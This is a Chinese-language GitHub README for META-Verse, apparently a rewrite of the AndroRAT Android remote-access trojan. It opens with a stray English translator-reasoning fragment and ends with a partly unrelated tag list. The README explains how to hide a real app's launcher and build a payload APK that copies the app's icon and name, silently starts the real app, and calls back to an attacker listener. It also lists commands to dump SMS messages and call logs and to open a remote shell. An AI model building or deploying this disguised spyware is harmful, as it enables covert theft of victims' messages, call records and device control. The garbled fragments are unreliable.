SameerAlSahab/META-Verse

# " and "Verse" means "universe". So, in translation, I might translate "Verse" to "宇宙" but keep "META" in English if it's a proper noun. 由 karma9874 开发的 [AndroRAT](https://github.com/karma9874/AndroRAT) 现代化重写版本，完全重构以实现在现代 Android 系统上正常运行（已测试至 Android 17）。由于 Android 新版本在权限和 API 方面的重大变更，原项目已无法在较新的 Android 版本上稳定工作。已在 Galaxy S25 Ultra 上完成测试。 本工具并非原版的精确克隆。META-Verse 专为用户有意在自己的设备上或授权测试环境中安装和使用载荷 APK 的场景而设计。 分步流程如下： 1. 使用 apktool 解码目标 APK 2. 从清单文件中提取应用名称、图标、包名和主活动 3. 移除目标应用的 LAUNCHER 意图类别，使其在安装后不再出现在主屏幕上 4. 重新构建并签名修改后的目标应用 5. 复制基础载荷 smali 文件，注入你的 IP/地址和端口，并修补代码使其在打开时启动真实应用 6. 用从目标应用提取的图标和标签替换载荷的图标和标签 7. 构建并签名最终载荷，输出为 out/metavas_launcher.apk ## 系统要求 - Linux 操作系统（已在 Ubuntu/Arch Linux 及其他 Linux 发行版上测试） - Java 11 或更高版本 - `aapt2`（来自 Android 构建工具） - Python 3.8 或更高版本（用于控制器） ## 构建载荷 ``` bash metavas.sh -i -p -t ``` 示例： ``` bash metavas.sh -i 192.168.1.10 -p 4444 -t ~/Downloads/someapp.apk ``` 执行完毕后，你将在 `out/` 目录中获得两个 APK： | 文件名 | 说明 | |---|---| | `_hidden.apk` | 真实应用，已移除其启动图标 | | `metavas_launcher.apk` | 载荷程序，伪装成真实应用的身份 | 将这两个 APK 都安装到设备上。载荷打开后，会静默启动隐藏的真实应用，并回调连接到你的监听器。 ## 运行控制器 使用方法 ``` pip install -r requirements.txt python3 control.py -i -p ``` 在设备连接前后启动监听器均可 —— 它会持续等待连接。 绑定到特定网络接口而非所有接口： ``` python3 control.py -i 0.0.0.0 -p 4444 ``` 设备连接后，你将获得一个交互式提示符： ``` python3 control.py -i 192.168.1.10 -p 4444 ``` ### 可用命令 | 命令 | 功能说明 | |---|---| | `deviceInfo` | 获取基本设备信息（型号、Android 版本等） | | `getSMS inbox` | 将收件箱短信导出到 `Dumps/` 目录下带时间戳的文件 | | `getSMS sent` | 同样导出已发送短信 | | `vibrate [次数]` | 振动设备指定次数 | | `getCallLogs` | 将通话记录导出到 `Dumps/` 目录 | | `getIP` | 返回设备的 IP 地址 | | `shell` | 进入设备上的交互式 Shell | | `help` | 显示命令列表 | | `clear` | 清空当前终端屏幕 | | `exit` | 关闭连接 | 在 `shell` 环境中，你将获得标准的交互式提示符 (`android@shell:~$`)。同时支持推送和拉取文件： ``` METAVERSE:/> ``` 所有导出的文件都会保存到运行 `control.py` 所在目录的 `Dumps/` 文件夹中，并按类型和时间戳命名。 ## 许可证 本项目依据 [GNU 通用公共许可证 v3.0](LICENSE) 条款进行授权。外部依赖可能采用不同的许可证分发，例如： - [apktool](https://github.com/iBotPeaches/Apktool)，采用 [Apache 许可证 2.0](https://github.com/iBotPeaches/Apktool/blob/master/LICENSE.md) - [platform_build](https://android.googlesource.com/platform/build/) (signapk)，采用 [Apache 许可证 2.0](https://source.android.com/docs/setup/about/licenses) ## 鸣谢 - 原始载荷 APK — [karma9874](https://github.com/karma9874/AndroRAT) - META-Verse 及初步构想 — Sameer Al Sahab

标签：aapt2, Android payload, Android安全, apktool, APK修改, C2服务器, IP配置, JS文件枚举, payload生成, Python, smali, 云资产清单, 安全测试, 恶意软件, 攻击性安全, 无后门, 渗透工具, 目录枚举, 移动安全, 端口监听, 网络回调, 规避防御, 远程访问木马, 逆向工具, 逆向工程, 隐藏应用